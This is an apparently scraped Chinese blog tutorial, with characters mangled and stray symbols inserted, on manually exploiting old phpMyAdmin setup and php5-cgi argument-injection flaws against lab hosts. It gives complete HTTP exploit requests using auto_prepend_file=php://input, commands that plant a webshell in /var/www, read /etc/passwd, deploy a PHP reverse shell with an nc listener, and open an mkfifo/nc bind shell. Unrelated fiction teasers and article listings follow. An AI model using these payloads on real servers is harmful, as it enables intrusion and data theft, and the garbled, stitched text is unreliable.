手動(dòng)漏洞挖掘(一)

早期phpMyAdmin服務(wù)器的一個(gè)漏洞

php服務(wù)器默認(rèn)安裝如果setup不禁用掉的話稽屏,可以不通過(guò)登陸賬號(hào)直接進(jìn)入到里面進(jìn)行配置

http://192.168.133.132/phpMyAdmin/setup/

通過(guò)post方法绢慢,修改PHP主配置文件橙垢,就可以執(zhí)行命令行對(duì)服務(wù)器進(jìn)行操作纱扭,php語(yǔ)言中passthru函數(shù)可以執(zhí)行操作系統(tǒng)的指令

1

http://192.168.20.10/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1 通過(guò)phpMyAdmin修改.ini主配置文件

1

POST http://192.168.133.132/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1

Host: 192.168.20.10

Content-Length: 34




passthru('ls');

die();

?>

打開(kāi)burpsuite峡迷,在repeater中執(zhí)行以上的代碼颇象,Go

就可以在右側(cè)返回的信息中看到執(zhí)行的結(jié)果

只要在passthru()方法中添加想要執(zhí)行的命令

甚至可以寫(xiě)文件伍伤,這樣我們就可以在目標(biāo)服務(wù)器中提交木馬等操作了。

一枚簡(jiǎn)單的木馬

利用的是位于phpMyAdmin/setup下的漏洞

1

POST http://192.168.133.132/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1

Host: 192.168.20.10

Content-Length: 100




passthru('echo "" > /var/www/2.php');

die();

?>

打開(kāi)burpsuite遣钳,在repeater中執(zhí)行以上的代碼扰魂,Go

passthru('cat /var/www/2.php');

查看剛才寫(xiě)的文件,返回發(fā)現(xiàn)寫(xiě)成功了

打開(kāi)l瀏覽器輸入

http://192.168.133.132/2.php?cmd=id

http://192.168.133.132/2.php?cmd=pwd

http://192.168.133.132/2.php?cmd=ls

http://192.168.133.132/2.php?cmd=cat /etc/passwd

你會(huì)發(fā)現(xiàn)這樣操作非常像在shell中執(zhí)行蕴茴,只要在變量"劝评?cmd="后面添加命令即可

php反彈shell

它在kali的位置

/usr/share/webshells/php/php-reverse-shell.php

修改一下,把IP換成本機(jī)的IP地址

然后將所有內(nèi)容復(fù)制下來(lái)復(fù)制到在burpsuite的body中

先不發(fā)送請(qǐng)求倦淀,打開(kāi)一個(gè)終端輸入 nc -nvvlp 1234 偵聽(tīng)這個(gè)端口號(hào)蒋畜,再發(fā)送請(qǐng)求

于是就建立了連接,就可以在終端上操作php的服務(wù)器了撞叽,和在自己終端上操作差不多

有時(shí)候會(huì)發(fā)現(xiàn)有些命令執(zhí)行不了姻成,比如ifconfig插龄,這是因?yàn)楝F(xiàn)在的用戶權(quán)限下,有些命令的環(huán)境變量沒(méi)有設(shè)置好佣渴,我們可以查找到這個(gè)命令的位置辫狼,然后執(zhí)行它

cd /sbin

./ifconfg

就能執(zhí)行了

又一枚木馬

這個(gè)利用ubuntu/debian默認(rèn)安裝的php5-cgi的漏洞

可直接訪問(wèn)/cgi-bin/php5和/cgi-bin/php ,這兩個(gè)目錄位于操作系統(tǒng)的根目錄下

辛润,而不是在web的根目錄下

膨处,它們不會(huì)在網(wǎng)頁(yè)頁(yè)面上顯示,所以這些目錄用掃描工具是爬網(wǎng)爬不出來(lái)的砂竖,但是他們是可以被訪問(wèn)的真椿。

打開(kāi)burpsuite,輸入

1

POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1

Host: 123

Content-Length: 50




echo system('cat /etc/passwd');

die();

?>

1

2注:%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1

這一串是經(jīng)過(guò)編碼之后的內(nèi)容乎澄,對(duì)它解碼會(huì)發(fā)現(xiàn)是這些內(nèi)容突硝,為為什么要這樣編碼呢?是因?yàn)閜hp服務(wù)器進(jìn)行了一些過(guò)濾機(jī)制,如果用明文還執(zhí)行不成功置济。

1

一定要有host,后面的內(nèi)容可以隨便填
Host: 123

go

在服務(wù)器上打開(kāi)一個(gè)偵聽(tīng)端口

echo system('mkfifo /tmp/pipe;sh /tmp/pipe | nc -nlp 444| > /tmp/pipe');

php服務(wù)器開(kāi)啟一個(gè)端口等待連接

然后打開(kāi)一個(gè)終端用nc連接解恰,就拿到shell了

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個(gè)濱河市浙于,隨后出現(xiàn)的幾起案子护盈,更是在濱河造成了極大的恐慌,老刑警劉巖羞酗,帶你破解...
    沈念sama閱讀 206,839評(píng)論 6 482
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件腐宋,死亡現(xiàn)場(chǎng)離奇詭異,居然都是意外死亡檀轨,警方通過(guò)查閱死者的電腦和手機(jī)胸竞,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,543評(píng)論 2 382
  • 文/潘曉璐 我一進(jìn)店門(mén),熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)参萄,“玉大人卫枝,你說(shuō)我怎么就攤上這事《锟妫” “怎么了剃盾?”我有些...
    開(kāi)封第一講書(shū)人閱讀 153,116評(píng)論 0 344
  • 文/不壞的土叔 我叫張陵,是天一觀的道長(zhǎng)淤袜。 經(jīng)常有香客問(wèn)我痒谴,道長(zhǎng),這世上最難降的妖魔是什么铡羡? 我笑而不...
    開(kāi)封第一講書(shū)人閱讀 55,371評(píng)論 1 279
  • 正文 為了忘掉前任积蔚,我火速辦了婚禮,結(jié)果婚禮上烦周,老公的妹妹穿的比我還像新娘尽爆。我一直安慰自己怎顾,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 64,384評(píng)論 5 374
  • 文/花漫 我一把揭開(kāi)白布漱贱。 她就那樣靜靜地躺著槐雾,像睡著了一般。 火紅的嫁衣襯著肌膚如雪幅狮。 梳的紋絲不亂的頭發(fā)上募强,一...
    開(kāi)封第一講書(shū)人閱讀 49,111評(píng)論 1 285
  • 那天,我揣著相機(jī)與錄音崇摄,去河邊找鬼擎值。 笑死,一個(gè)胖子當(dāng)著我的面吹牛逐抑,可吹牛的內(nèi)容都是我干的鸠儿。 我是一名探鬼主播,決...
    沈念sama閱讀 38,416評(píng)論 3 400
  • 文/蒼蘭香墨 我猛地睜開(kāi)眼厕氨,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼进每!你這毒婦竟也來(lái)了?” 一聲冷哼從身側(cè)響起命斧,我...
    開(kāi)封第一講書(shū)人閱讀 37,053評(píng)論 0 259
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤品追,失蹤者是張志新(化名)和其女友劉穎,沒(méi)想到半個(gè)月后冯丙,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 43,558評(píng)論 1 300
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡遭京,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 36,007評(píng)論 2 325
  • 正文 我和宋清朗相戀三年胃惜,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片哪雕。...
    茶點(diǎn)故事閱讀 38,117評(píng)論 1 334
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡船殉,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出斯嚎,到底是詐尸還是另有隱情利虫,我是刑警寧澤,帶...
    沈念sama閱讀 33,756評(píng)論 4 324
  • 正文 年R本政府宣布堡僻,位于F島的核電站糠惫,受9級(jí)特大地震影響,放射性物質(zhì)發(fā)生泄漏钉疫。R本人自食惡果不足惜硼讽,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 39,324評(píng)論 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望牲阁。 院中可真熱鬧固阁,春花似錦壤躲、人聲如沸。這莊子的主人今日做“春日...
    開(kāi)封第一講書(shū)人閱讀 30,315評(píng)論 0 19
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)。三九已至并齐,卻和暖如春漏麦,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背冀膝。 一陣腳步聲響...
    開(kāi)封第一講書(shū)人閱讀 31,539評(píng)論 1 262
  • 我被黑心中介騙來(lái)泰國(guó)打工唁奢, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人窝剖。 一個(gè)月前我還...
    沈念sama閱讀 45,578評(píng)論 2 355
  • 正文 我出身青樓麻掸,卻偏偏與公主長(zhǎng)得像,于是被迫代替她去往敵國(guó)和親赐纱。 傳聞我的和親對(duì)象是個(gè)殘疾皇子脊奋,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 42,877評(píng)論 2 345

推薦閱讀更多精彩內(nèi)容

  • 九 嘎子張從市里回來(lái),立即給小狐貍打了一個(gè)電話疙描,對(duì)他說(shuō)外面風(fēng)聲很緊诚隙,切不可再讓人知曉有這件東西。他講了那天電視臺(tái)采...
    靜聞魚(yú)讀月槐花語(yǔ)閱讀 313評(píng)論 0 0
  • JAVA序列化機(jī)制的深入研究 對(duì)象序列化的最主要的用處就是在傳遞,和保存對(duì)象(object)的時(shí)候,保證對(duì)象的完整...
    時(shí)待吾閱讀 10,837評(píng)論 0 24
  • 十月中旬本應(yīng)還有一絲暖意地消,但連著下了兩天的雨,這回冷得可以穿冬衣了畏妖。 和小蜘蛛俠走在上課回來(lái)的路上脉执,...
    yuhuiluan閱讀 372評(píng)論 0 3
  • 人生就像一部列車(chē),每一站戒劫,都會(huì)不斷有人上車(chē)半夷,有人下車(chē)。人生列車(chē)充滿不確定性迅细,但也是自己選擇的結(jié)果巫橄,很多人慢慢成了路...
    尋珈的櫻花閱讀 492評(píng)論 0 1
  • 在微信中徜徉, 在簡(jiǎn)書(shū)里奔跑茵典。 在藍(lán)天上飛翔嗦随, 在白云上閱讀。 在夕陽(yáng)西下散步烁设, 在一望無(wú)際的田野里流淌笼踩, 沉浸于...
    淺若燦陽(yáng)閱讀 199評(píng)論 6 13